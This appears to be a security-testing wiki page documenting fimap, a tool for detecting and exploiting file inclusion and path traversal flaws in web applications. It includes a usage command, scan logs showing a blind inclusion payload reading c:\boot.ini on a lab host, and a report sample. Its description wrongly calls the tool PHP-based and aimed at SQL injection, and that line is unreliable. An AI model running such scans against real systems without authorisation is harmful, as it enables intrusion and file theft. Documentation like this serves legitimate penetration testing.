Maguey Wiki

Maguey Application Testing Framework ™

Brought to you by: maguey

fimap-en

Back Español

fimap

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

Objective:

Detect and exploit Path Transversal vulnerabilities.

Features:

Supported technologies: Web applications (HTTP/HTTPS).

Operative mode: Active.

Detect and exploit Path Transversal vulnerabilities.

Provide the functionality to scan a single URL or a list of URLs.
Exploits Remote File Inclusion and Local File Inclusion vulnerabilities.
Provides a Google Hacking module to detect the web application resources.
Authentication support through cookies.

Reports:
Output reports: ✔

Report in XML format which includes the detected vulnerable URLs saved on the $HOME/fimap_result.xml path.

Basic usage:

Perform a basic URL scan with a vulnerable parameter. The following instruction initiates the scan on the URL to detect and exploit the Remote/Local File Inclusion vulnerability.

python fimap.py –s -b -u [URL]/[PAGE]?[PARAMETER]=

Where:
- -s: Simple mode scan focused on a single URL.
- -u: URL with the required parameters.
- -b: Blind mode used in cases in which the web application doesn’t throw any errors.
The tool will begin with a quick scan trying to exploit the vulnerability. If it is not successful, the tool will switch to “Blind mode”.

[16:51:45] [OUT] Inspecting URL 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='...
[16:51:45] [INFO] Fiddling around with URL...
[16:51:45] [INFO] Sniper failed. Going blind...

When the tool detects a vulnerable point for the injection it displays the payload used.

[16:51:45] [OUT] Possible file inclusion found blindly! -> 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005=c:\boot.ini' with Parameter 'txt005'.
[16:51:45] [OUT] Identifying Vulnerability 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='

Then the tool will performs additional test on the vulnerable point with different payload in order to verify and validate the vulnerability.

[16:51:45] [WARN] Unknown language - Autodetecting...
[16:51:45] [INFO] Autodetect thinks this could be a PHP-Script...
[16:51:45] [INFO] If you think this is wrong start fimap with --no-auto-detect
[16:51:45] [INFO] Testing file 'c:\boot.ini'...
[16:51:45] [INFO] Skipping absolute file 'php://input'.
[16:51:45] [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.

Finally, the tool will present the scan results summary.

###############################################################################
#[1] Possible PHP-File Inclusion #
###############################################################################
#::REQUEST #
# [URL] http://192.168.233.128:9001/miaplicacion/infof.php?txt005= #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] txt005 #
# [PATH] Not received (Blindmode) #
# [OS] Windows #
# [TYPE] Blindly Identified #
# [TRUNCATION] Not tested. #
# [READABLE FILES] #
# [0] boot.ini -> \c:\boot.ini #
###############################################################################

Example report:

<fimap>
<URL hostname="HOST">
<vuln appendix="" blind="1" file="FILE" header_dict="KGRwMAou" header_vuln_key="" ispost="0" kernel="" language="PHP/ASP/JSP/other" mode="r" os="win" param="PARAM" paramvalue="" path="/URL.php?PARAM=" postdata="" prefix="\" remote="0" suffix=""/>
…
</URL>
</fimap>

Resources:

Link: http://fimap.googlecode.com
Author(s): Iman Karim
Contact: fimap.dev [at] gmail.com
License: GNU GENERAL PUBLIC LICENSE Version 2